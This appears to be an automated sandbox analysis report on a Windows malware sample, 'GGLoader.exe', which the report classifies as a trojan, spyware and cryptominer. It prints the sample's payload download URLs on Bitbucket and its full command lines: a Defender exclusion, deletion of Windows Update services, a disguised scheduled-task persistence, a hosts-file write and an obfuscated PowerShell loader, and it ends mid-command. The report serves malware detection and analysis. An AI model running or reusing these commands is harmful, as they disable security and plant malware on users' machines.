Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000011.00000002.2039902997.00000270B9567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B9541000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: powershell.exe, 00000001.00000002.1828229655.000001EC319F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31666000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfa
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe
Source: powershell.exe, 00000001.00000002.1964124917.000001EC48EA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/B
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.ex
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1768225702.000002511F4A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C520930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000028.00000002.2580308005.000001C536C2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co&
Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F6B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree, 6_2_00792B90
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE2B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree, 35_2_00BE2B90
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00792C80 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 6_2_00792C80

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File dump: svcupdater.exe.6.dr 831814656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicenseGet.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicCheck.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicSend.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 6_2_00793F90
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B994C0 NtCreateUserProcess, 7_2_00007FF7D3B994C0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE3F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 35_2_00BE3F90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAB02CE NtUnmapViewOfSection, 40_2_00007FFD9BAB02CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAAF0E0 NtResumeThread, 40_2_00007FFD9BAAF0E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAAF0C0 NtSetContextThread, 40_2_00007FFD9BAAF0C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAB06C8 NtResumeThread, 40_2_00007FFD9BAB06C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAB04ED NtWriteVirtualMemory,NtSetContextThread, 40_2_00007FFD9BAB04ED
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 42_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey, 43_2_00000225DC642A7C
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793B60: GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 6_2_00793B60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_gckjyekc.li0.ps1
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: String function: 007A5D90 appears 54 times
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: String function: 00BF5D90 appears 54 times
Source: poduiwcd.tmp.7.dr Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Source: updater.exe.7.dr Static PE information: Number of sections : 11 > 10
Source: LicSend.exe.1.dr Static PE information: Number of sections : 11 > 10
Source: LicenseGet.exe.1.dr Static PE information: No import functions for PE file found
Source: LicenseGet.exe.1.dr Static PE information: Data appended to the last section found
Source: GGLoader.exe, 00000000.00000000.1702359898.0000000000FD8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
Source: GGLoader.exe Binary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
Source: GGLoader.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Commandline size = 3770
Source: unknown Process created: Commandline size = 5455
Source: unknown Process created: Commandline size = 5516
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Commandline size = 3770
Source: GGLoader.exe, dmjzx.cs Base64 encoded string: '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
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@64/89@1/2
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140002328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,HeapAlloc,CreateThread,CreateThread,Sleep,SleepEx, 42_2_0000000140002328
Source: C:\Windows\System32\dialer.exe Code function: 37_2_00007FF790DC17A4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 37_2_00007FF790DC17A4
Source: C:\Windows\System32\dialer.exe Code function: 37_2_00007FF790DC194C FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW, 37_2_00007FF790DC194C
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File created: C:\Program Files\Google\Chrome\updater.exe
Source: C:\Users\user\Desktop\GGLoader.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GGLoader.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aro4libn.snb.ps1
Source: GGLoader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GGLoader.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\GGLoader.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\GGLoader.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: GGLoader.exe ReversingLabs: Detection: 76%
Source: unknown Process created: C:\Users\user\Desktop\GGLoader.exe "C:\Users\user\Desktop\GGLoader.exe"
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+
''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 